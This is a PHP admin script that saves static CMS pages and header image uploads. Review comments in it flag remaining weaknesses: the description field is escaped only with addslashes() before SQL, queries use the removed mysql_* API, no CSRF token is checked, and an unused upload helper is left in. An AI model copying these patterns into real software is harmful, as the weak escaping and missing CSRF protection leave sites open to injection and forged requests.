<?php
include_once("session.php");
include_once("settings.php");
include_once("session.php");
/*echo "<pre>";
print_r($_REQUEST);
echo "<pre>";*/
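// Import request parameters into local variables, but only the fields this
// script actually reads. Copying every request key with $$key = $value lets
// the client overwrite any variable already in scope, including whatever
// session.php / settings.php defined and the upload path computed below.
$allowedFields = array(
    'id', 'parentId', 'txtTitle', 'linkType', 'EditDescription',
    'headerDisplay', 'footerDisplay', 'leftDisplay', 'externalLink',
    'metaTitle', 'metaKeyword', 'metaDescription', 'orderOfAppearance',
    'logo', 'thumbnail', 'bannerColor', 'status',
);
foreach ($allowedFields as $field) {
    // Arrays (e.g. id[]=...) are ignored: every consumer below expects a string.
    if (isset($_REQUEST[$field]) && is_scalar($_REQUEST[$field])) {
        $$field = (string) $_REQUEST[$field];
    }
}

// This is the only escaping the description receives before it is placed
// inside the SQL statements further down.
// NOTE(review): addslashes() is not charset-aware; escaping with the
// connection-aware function at the point of use would be safer.
$EditDescription = isset($EditDescription) ? addslashes($EditDescription) : '';

// Destination for the header image: <unix time><client file name>.
// NOTE(review): the client-supplied name, extension included, ends up in a
// directory that looks web-served; nothing at this point restricts the type.
$prefix = time();
$uploadedName = isset($_FILES['header']['name']) ? $_FILES['header']['name'] : '';
$target_path = "../cat_images/headerImage/" . basename($prefix . $uploadedName);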
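/**
 * Store an uploaded PNG or GIF under ../cat_images/headerImage/.
 *
 * The stored name is "<form field name><unix time>.<extension>"; the
 * client-supplied file name contributes nothing but its extension.
 * When the file is rejected, a script redirecting to the static page
 * list is written to the output.
 *
 * @param string $fileName Key of the upload inside $_FILES.
 * @return string Stored file name, or '' when nothing was stored.
 */
function uploadPhoto($fileName){
    // Missing field or an upload error reported by PHP: nothing to store.
    // (The original returned an undefined variable on this path.)
    if (!isset($_FILES[$fileName]) || $_FILES[$fileName]["error"] != 0) {
        return '';
    }

    $tmp_name = $_FILES[$fileName]["tmp_name"];

    // ereg_replace() no longer exists in PHP 7; preg_replace() applies the same character filter.
    $photoName = preg_replace("/[^A-Za-z0-9.]/", "", $_FILES[$fileName]["name"]);
    $photoNameArr = explode(".", $photoName);
    $fileExt = strtolower($photoNameArr[count($photoNameArr) - 1]);

    // Extension allowlist, each paired with the image type the content must have.
    $allowedTypes = array("png" => IMAGETYPE_PNG, "gif" => IMAGETYPE_GIF);

    $accepted = false;
    if (isset($allowedTypes[$fileExt])) {
        // The extension is chosen by the client, so confirm the bytes really
        // are an image of that type before it lands in a served directory.
        $imageInfo = @getimagesize($tmp_name);
        $accepted = ($imageInfo !== false && $imageInfo[2] === $allowedTypes[$fileExt]);
    }

    if (!$accepted) {
        echo "<script>\ndocument.location=\"static_page_list.php?page=listpage\";\n</script>\n";
        return '';
    }

    $img1New = $fileName.time().".".$fileExt;

    // Report the name only if the file was actually moved into place.
    if (!move_uploaded_file($tmp_name, "../cat_images/headerImage/".$img1New)) {
        return '';
    }
    return $img1New;
}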
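// Create or update a row of tbl_static_pages from the submitted form, storing
// an optional header image next to it.
//
// NOTE(review): the mysql_* extension was removed in PHP 7. It is kept here
// because the connection is opened outside this block; migrating the whole
// panel to mysqli/PDO prepared statements is the durable fix.
// NOTE(review): no CSRF token is checked in this script; confirm that
// session.php enforces authentication and add a token check for this
// state-changing request.

/**
 * Validate the upload in $_FILES[$field] and move it into $destDir.
 *
 * Only files whose extension is allowlisted AND whose content is an image of
 * the matching type are accepted. The stored name is rebuilt from the prefix,
 * the sanitized base name and the validated extension, so a client-chosen name
 * such as "x.php" or "x.php.png" can never produce a script in the directory.
 *
 * @param string $field   Key of the upload inside $_FILES.
 * @param string $prefix  Prefix for the stored name (a timestamp in this script).
 * @param string $destDir Destination directory, with trailing slash.
 * @return string Stored file name, or '' when nothing was stored.
 */
function storeStaticPageHeaderImage($field, $prefix, $destDir)
{
    if (!isset($_FILES[$field]) || $_FILES[$field]['error'] !== UPLOAD_ERR_OK) {
        return '';
    }

    // Adjust this list to the formats the site really needs.
    $allowedTypes = array(
        'png'  => IMAGETYPE_PNG,
        'gif'  => IMAGETYPE_GIF,
        'jpg'  => IMAGETYPE_JPEG,
        'jpeg' => IMAGETYPE_JPEG,
    );

    $clientName = basename($_FILES[$field]['name']);
    $extension = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset($allowedTypes[$extension])) {
        return '';
    }

    // The extension is client-controlled; check the content as well.
    $imageInfo = @getimagesize($_FILES[$field]['tmp_name']);
    if ($imageInfo === false || $imageInfo[2] !== $allowedTypes[$extension]) {
        return '';
    }

    // Dots are stripped from the base name so only one extension survives.
    $baseName = preg_replace('/[^A-Za-z0-9_-]/', '', pathinfo($clientName, PATHINFO_FILENAME));
    $storedName = $prefix . $baseName . '.' . $extension;

    if (!move_uploaded_file($_FILES[$field]['tmp_name'], $destDir . $storedName)) {
        return '';
    }

    // Readable by the web server, writable by the owner only (was 0777).
    chmod($destDir . $storedName, 0644);

    return $storedName;
}

$headerDir = "../cat_images/headerImage/";
$namePrefix = isset($prefix) ? $prefix : time();

// sanitize_data() is defined outside this file's visible code.
$pageKey = sanitize_data(@$txtTitle);

if (isset($_REQUEST['mode']) && $_REQUEST['mode'] == "Edit") {
    // $id arrives from the request and is placed in SQL unquoted, so force it to an integer.
    $staticId = (int) @$id;

    $sqlUnlink = "SELECT * FROM `tbl_static_pages` WHERE `staticId` = ".$staticId." LIMIT 1";
    $ressetUnlink = mysql_query($sqlUnlink);
    if ($ressetUnlink === false) {
        // Keep driver errors in the server log instead of sending them to the browser.
        error_log("static page lookup failed: " . mysql_error());
        die("Unable to load the page.");
    }
    $rowUnlink = mysql_fetch_assoc($ressetUnlink);
    $unlinkFile = ($rowUnlink && isset($rowUnlink['headerImage'])) ? $rowUnlink['headerImage'] : '';

    $upload_image = '';
    if (isset($_FILES['header']['name']) && $_FILES['header']['name'] != "") {
        $upload_image = storeStaticPageHeaderImage('header', $namePrefix, $headerDir);
    }

    // Touch the headerImage column only when a new file was really stored;
    // a rejected or failed upload must not blank the existing image.
    $bannerImg = '';
    if ($upload_image != '') {
        $bannerImg = "`headerImage` = '".mysql_real_escape_string($upload_image)."',";
    }

    // $EditDescription was passed through addslashes() near the top of the
    // file, so it is not escaped a second time here.
    $sql = "UPDATE
`tbl_static_pages` SET
`parentId` = '".mysql_real_escape_string(@$parentId)."',
`staticTitle` = '".mysql_real_escape_string(@$txtTitle)."',
`pageKey` = '".mysql_real_escape_string(@$pageKey)."',
`linkType` = '".mysql_real_escape_string(@$linkType)."',
`staticDescription` = '".@$EditDescription."',
`headerDisplay` = '".mysql_real_escape_string(@$headerDisplay)."',
`footerDisplay` = '".mysql_real_escape_string(@$footerDisplay)."',
`leftDisplay` = '".mysql_real_escape_string(@$leftDisplay)."',
`externalLink` = '".mysql_real_escape_string(@$externalLink)."',
`metaTitle` = '".mysql_real_escape_string(@$metaTitle)."',
`metaKeywords` = '".mysql_real_escape_string(@$metaKeyword)."',
`metaDescription` = '".mysql_real_escape_string(@$metaDescription)."',
`orderOfAppearance` = '".mysql_real_escape_string(@$orderOfAppearance)."',
".$bannerImg."
`logo` = '".mysql_real_escape_string(@$logo)."',
`thumbnail` = '".mysql_real_escape_string(@$thumbnail)."',
`bannerColor` = '".mysql_real_escape_string(@$bannerColor)."',
`enable` = '".mysql_real_escape_string(@$status)."',
`updatedOn` = unix_timestamp(),
`updatedBy` = 'admin'
WHERE
`staticId` = ".$staticId."
LIMIT 1 ";
}
else {
    $headerImage = storeStaticPageHeaderImage('header', $namePrefix, $headerDir);

    // $EditDescription is inserted as-is for the same reason as in the UPDATE above.
    $sql = sprintf("INSERT INTO
`tbl_static_pages`(
`parentId`,
`staticTitle`,
`pageKey`,
`staticDescription`,
`linkType`,
`headerDisplay`,
`footerDisplay`,
`leftDisplay`,
`externalLink`,
`metaTitle`,
`metaKeywords`,
`metaDescription`,
`orderOfAppearance`,
`bannerColor`,
`enable`,
`headerImage`,
`thumbnail`,
`createdOn`,
`createdBy`)
VALUES
('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s',unix_timestamp(),'admin')",
        mysql_real_escape_string(@$parentId),
        mysql_real_escape_string(@$txtTitle),
        mysql_real_escape_string(@$pageKey),
        @$EditDescription,
        mysql_real_escape_string(@$linkType),
        mysql_real_escape_string(@$headerDisplay),
        mysql_real_escape_string(@$footerDisplay),
        mysql_real_escape_string(@$leftDisplay),
        mysql_real_escape_string(@$externalLink),
        mysql_real_escape_string(@$metaTitle),
        mysql_real_escape_string(@$metaKeyword),
        mysql_real_escape_string(@$metaDescription),
        mysql_real_escape_string(@$orderOfAppearance),
        mysql_real_escape_string(@$bannerColor),
        mysql_real_escape_string(@$status),
        mysql_real_escape_string($headerImage),
        mysql_real_escape_string(@$thumbnail));
}

// The statement runs exactly once; the original executed the UPDATE inside
// the Edit branch and then a second time here.
$result = mysql_query($sql);
if ($result === false) {
    error_log("static page save failed: " . mysql_error());
    die("Unable to save the page.");
}

// Remove the replaced image only after the row points at the new one.
// basename() keeps a stored value containing path separators from reaching
// outside the image directory.
if (!empty($upload_image) && !empty($unlinkFile) && basename($unlinkFile) !== $upload_image) {
    @unlink($headerDir . basename($unlinkFile));
}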
?>
<script>
document.location="static_page_list.php?page=listpage";
</script>